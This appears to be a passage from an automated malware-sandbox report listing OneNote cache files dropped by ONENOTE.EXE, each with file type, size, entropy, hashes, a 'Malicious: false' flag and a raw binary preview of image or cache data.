Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.312149666120548
Encrypted:	false
SSDEEP:	48:msvqSAjq4nA+tK1AyXEr0DgXnv9S8oVrdQqrDT9SBXqp3zBJwstB:msP4nB2XEugXv9S80RQyfkCwg
MD5:	BCB633D33CA674AA215B3ED3151A6AAC
SHA1:	EF8A64B3DCBBADBAD59A3F6D3D2615C3200BB83C
SHA-256:	1EDA5E6DC2FA4B2436B5B728B48D65979B8660C3CBA1008E234DD03682B293B9
SHA-512:	73ACEE52EC3CC0F831D5ECE52FFBBDC90F99296C3858E5F6A5581A222D665FD60C5E7D13CBF5876EC5C374E1B2576CF5E5EB1E763B9A1ACCC3F7121D1FCDAB78
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ..T.......T!.(..,.....#$..T!.(..,.....#$..T..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............<Gh.@'..=.:,t.K(....N...^..................!...N...2. ..........f........................................I.qk..B.....LZ............<Gh.@'..=.:,t.K(........<Gh.@'..=.:,t.K(...........T.......T.......T...........................................Tj......TT.]....T.......T..B....TH......T..B....T..>.)..T..J...................;........4...4...4.."................T...T...T..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4...........T.......T....#..T............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	47294
Entropy (8bit):	7.497888607667405
Encrypted:	false
SSDEEP:	768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
MD5:	7A450E086AD14BA7D89BA5DB3D3AE6C7
SHA1:	E7AEAFCFCE476390E18C19456BDF6529D863D518
SHA-256:	BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
SHA-512:	9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1\|....[...jQ.%Zb.......t............V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.429612900760069
Encrypted:	false
SSDEEP:	96:os3lE4ieEkEwQXGB92SkRQyQGE42QeoT:os3lTieawQXGB92SkRJQGT2Qeo
MD5:	68F7A61C93954CCC369D8430C2149F7E
SHA1:	25609AE097FB6A1421D75770B7FCE5F1FC21A5BE
SHA-256:	76F11ED704F42AE1763AD0017767830678287FA0AC8CFA97AE3A7E5361E7D340
SHA-512:	54FFCF387E0E26B5003EA2900AD2CD1B7BA6D4A31EAB2FC8D506B32EDFCEE2337F615AA5C080C52BBF7E60C7CCB3B12F1EC0808E706F071CA792420EAAD274E6
Malicious:	false
Preview:	2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZd.......d.....u.>(...d..d.....u.>(...d..d....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............nZ.l...<..u........N...^...............T.....D.J...B.........f........................................I.qk..B.....LZ.............nZ.l...<..u.............nZ.l...<..u.............d.......d.......d...........................................d..j....d..T.]..d.......d....B..d..H....d....B..d....>.)d....J...................;........4...4...4.."..............d...d...d....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........d.......d......#d..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 60 x 336, 4-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	347
Entropy (8bit):	6.85024426015615
Encrypted:	false
SSDEEP:	6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
MD5:	78762C169F8B104CB57DFF5A1669D2DF
SHA1:	9638B71B584CD636834016A635ABF8D9C0887711
SHA-256:	E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
SHA-512:	5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
Malicious:	false
Preview:	.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..\|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....\|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.35299879342195
Encrypted:	false
SSDEEP:	48:ksqcr3BWS+wjtsjxcE6qXSNf999CioWERrdQqr8KuRBXkP3C592XuD3CCstW:ksqCWS+wjCjmEFXSX99CinsRQy8JeIz
MD5:	EC63F3B2DC5F1BD90B3227150B8E8F7C
SHA1:	E40E844CAE36309A5EE117BE364CBC200A5F6D9D
SHA-256:	69574B2C35C02C93C35131D185E6A152D9FAD19835BB4A0A3BB8BFD18D7F2C87
SHA-512:	1F2EB8569B5CCDAA542CB0699EAB62E08FF47FEA46C4031F56D30AC0DE5300D01BBF1A89CCD95433CCC88DE7BA1B1B3EB64864D8475170CD2FDD20406342FFDF
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZG!......G!.n.e.?G....r.G!.n.e.?G....r.G!...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............6@..gg....Y........N...^...............N."..+.E.+@y..10........f........................................I.qk..B.....LZ............6@..gg....Y............6@..gg....Y.............G!......G!......G!..........................................G!.j....G!.T.]..G!......G!..B..G!.H....G!...B..G!...>.)G!...J...................;........4...4...4.."..............G!..G!..G!...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........G!......G!.....#G!.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 617, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	827
Entropy (8bit):	7.23139555596658
Encrypted:	false
SSDEEP:	12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
MD5:	3E675D61F588462FB452342B14BCF9C0
SHA1:	86B62019BC3C5BE48B654256B5D10293FC8C842A
SHA-256:	639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
SHA-512:	E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
Malicious:	false
Preview:	.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.\|.._...7..D..Ya.l.....{.@&.\|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.325623477799434
Encrypted:	false
SSDEEP:	96:esOBlTl7I/6EXnPX39CEcRQysoFlTixT6FCJ:esOBlTl7IPXnPX39CEcRJHFlTixT6FC
MD5:	71958033A5AC3D5E6F597F064AA3FEA0
SHA1:	CC04E9F2DD312EAE6F19F44D9E2BC58FE8CC1BDC
SHA-256:	C5E2E47E49C2BB746D7049EC3848165BCD929725F752C3EAFC7312EDB2374886
SHA-512:	3E27EDCE21B7E0BE5CC47C45A8CB963568365C0883239FD5DDEA17BD7E2D1D737D9676F4C3FA460FD580CFCB61F1D0FD568BAB08A51161CD4E9C7D4E4585050A
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZN.`.....N.`...,......9)LN.`...,......9)LN.`..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............K.5.... .a.Ol......N...^..................<...I.L].0.\|z........f........................................I.qk..B.....LZ.............K.5.... .a.Ol...........K.5.... .a.Ol...........N.`.....N.`.....N.`.........................................N.`j....N.`T.]..N.`.....N.`..B..N.`H....N.`..B..N.`..>.)N.`..J...................;........4...4...4.."..............N.`.N.`.N.`..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........N.`.....N.`....#N.`............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	4410
Entropy (8bit):	7.857636973514526
Encrypted:	false
SSDEEP:	96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
MD5:	2494381A1ACDC83843B912CFCDE5643B
SHA1:	98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
SHA-256:	5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
SHA-512:	0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
Malicious:	false
Preview:	.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}\|..{'.U..~......}....s.............,CVu.x.:C..5...;.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.336245046942891
Encrypted:	false
SSDEEP:	48:YuNEBsxuKMKZtLCwEZUncf0L2XN9G+olrdQqrBYZBX4tbxZ:YHBs/MKZVnEZnf0CXN9G+ERQyOZM
MD5:	56993A6C0E347CE861FD81CF1B7B04AC
SHA1:	6D03A1BF0EE65D24C955D7D33B00F98BD759EC45
SHA-256:	0BCCB7B781A408A788743162C2F840DF2A8BA93496B5BAAA896486FA25D519CC
SHA-512:	E354F7DB1F54E7E5403B70BE6FBB96DD6AD3AF41738289AB3AC7243A90A61CD1AA2E29835E9819571D7DA76FDD8F8CE01E3F7E95F7F840710F2E022854D7240C
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZK"......K"......u.?..K"......u.?..K"...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............} .E..>.....GEs.....N...^...............NM-..lIO....=...........f........................................I.qk..B.....LZ............} .E..>.....GEs.........} .E..>.....GEs..........K"......K"......K"..........................................K".j....K".T.]..K"......K"...B..K".H....K"...B..K"...>.)K"...J...................;........4...4...4.."..............K"..K"..K"...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........K"......K".....#K".............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	136726
Entropy (8bit):	7.973487854173386
Encrypted:	false
SSDEEP:	3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
MD5:	4A2472AC2A9434E35701362D1C56EDDF
SHA1:	16FA2EA2D2808D75445896E03B67A93000EEDDD8
SHA-256:	505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
SHA-512:	5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....\|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.352231156163611
Encrypted:	false
SSDEEP:	48:/JAsFvALT5QMTXi/t+dmwEKHL7NLXPXL9eqo9rdQqrmlKBXgBftdl:/JAs1M7i/Y9EKHVLXfL9eqERQyfWd
MD5:	EA7E2ECC90FE5431B71812DD522778E1
SHA1:	75ED9845EB0DF92B436EDF82587333386C800196
SHA-256:	F6DE48E89DCAC6C347AD5ACF5658E9A07BCD3ACF1E6AF5093E2FB824A02F3EEF
SHA-512:	31CA195598ED3EFD16387A33FDC6752F9ADA6595C8766949689AFB74F99AEF2202D9A654A93BE2FDE056568DE0E0E1F30071A2B17803B8C37E24E1F94ADF4B36
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ6.!.....6.!dXc5..o.yt...6.!dXc5..o.yt...6.!..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............t.Y....t.7.......N...^....................G..m............f........................................I.qk..B.....LZ..............t.Y....t.7.............t.Y....t.7............6.!.....6.!.....6.!.........................................6.!j....6.!T.]..6.!.....6.!..B..6.!H....6.!..B..6.!..>.)6.!..J...................;........4...4...4.."..............6.!.6.!.6.!..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........6.!.....6.!....#6.!............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 77 x 627, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5136
Entropy (8bit):	7.622045262603241
Encrypted:	false
SSDEEP:	96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
MD5:	FA38AFA965141EA3F17863EE8DCCDE61
SHA1:	2B4611E651AF7549C1AA73932B1136B561A7602F
SHA-256:	E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
SHA-512:	A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
Malicious:	false
Preview:	.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000060.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.44151192461428
Encrypted:	false
SSDEEP:	96:WgjsIv7ypiaaZErX+R9qqcRQy7hJ70uMK8:dsFia/rXE9qqcRJ7h
MD5:	F508D6CAC6796E70E1CD8EA415F0F733
SHA1:	96AA6FD43BA684B5CE9D6CC9FC67CA6506DD9EA0
SHA-256:	314995BFEEBCA9EC64CF2ABDFE729F87A4231EF0BB01C62B2C362AEC8A9CF821
SHA-512:	81B3EB48CC48649F010026694FE5D9ACC8342D55E102409C2DF2D89E65026CEF45818492A4A7D1051E4503F448AB1C65F7247DFB3F667A135C59B1DE47B2B1F1
Malicious:	false
Preview:	2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZ.=.......=.......,K.U..=.......,K.U..=...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............Q!....2..`.......N...^..................m...C.#.[..+_........f........................................I.qk..B.....LZ............Q!....2..`...........Q!....2..`.............=.......=.......=...........................................=.j.....=.T.]...=.......=...B...=.H.....=...B...=...>.).=...J...................;........4...4...4.."...............=...=...=...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........=.......=.....#.=.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000061.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000062.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.458910926638198
Encrypted:	false
SSDEEP:	48:zWbmsR+kXMzlLYItqLLLCEbL2XXoXVdb9uYd63QErdqrb0hVBX+akhkZ2Lkhv5kn:JsKlLYIoPeEb5XVl9uYd6FRyKLtI
MD5:	835131EB6B8F189FDE2A683589E85A7E
SHA1:	A5227A1750AB4A6649E854A3990A39D4D712A907
SHA-256:	A9E7D32D0B2305F495671395079451ABF40FFA901A9BE5A2DDC80CA33D4FC114
SHA-512:	AE7F8D4A33FAA4E94A4A8553D4FFB9224CDCE0ED403DF3545D9C8F3175F8A7265067DBFD3151EA431E04E05D3E8E83C542D40B396817C1A8C3FB8136B083C5A6
Malicious:	false
Preview:	2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZOx......Ox..q.#..F..1.Ox..q.#..F..1.Ox...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............n.......r{5.,b.....N...^................`...;L.....pC.........f........................................I.qk..B.....LZ.............n.......r{5.,b..........n.......r{5.,b..........Ox......Ox......Ox..........................................Ox.j....Ox.T.]..Ox......Ox..B..Ox.H....Ox...B..Ox...>.)Ox...J...................;........4...4...4.."..............Ox..Ox..Ox...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........Ox......Ox.....#Ox.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000063.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	79656
Entropy (8bit):	7.966459570826366
Encrypted:	false
SSDEEP:	1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
MD5:	39FF3ACAE544EAC172B1269F825B9E9F
SHA1:	2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
SHA-256:	70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
SHA-512:	3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\..N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.\|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........\|..4.wJ..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000064.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.451503687271817
Encrypted:	false
SSDEEP:	48:pSsng/09mzhalP+tuoEWnRqlRXE/N9DVo7Brdqr2JfBRXr0Dh37Jn:pSsnVmlaP+VEvXQN9DV0Ry2tBdY7
MD5:	B4885C470E020EC947C281114CB73940
SHA1:	C4816EBA1A1618170782593CFEC3A39D136C50B1
SHA-256:	E5AC3E93E0278B8DD65EB52B6D411A2B2F9F8677DC5E4E8EEB31C9744C2FBF6A
SHA-512:	7DE0772D537B931FD9A24D8673F415FBAC6643EFF6DC6897CB87C91656613554CD5177EE55E21B41ACF98F4451711B1F32E91E718FEF4EFA409BAEBA4583A487
Malicious:	false
Preview:	2...>.......p...v...d.....................................................?....?........................................................................2...>...L.......v................................I.......I.qk..B.....LZJ"F.....J"F.....%cM..#.J"F.....%cM..#.J"F..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............2y/..d.. m.KPZ6....N...^................&.=8..F.k...,..........f................................... ....I.qk..B.....LZ............2y/..d.. m.KPZ6........2y/..d.. m.KPZ6.........J"F.....J"F.....J"F.........................................J"Fj....J"FT.]..J"F.....J"F..B..J"FH....J"F..B..J"F..>.)J"F..J...................;........4...4...4.."..............J"F.J"F.J"F..z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........J"F.....J"F....#J"F............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000065.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000066.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.315489763193309
Encrypted:	false
SSDEEP:	96:YVsOrTWjuEz+LXuuO9jomBRyE70VQxieG4v8:WsOrTY7qLXuuO9joMRyE70VStGq8
MD5:	AEE55F2FF68945A4111BECB9A6CA8217
SHA1:	D713F028177A6548C6496BD706CAC346DD38E76F
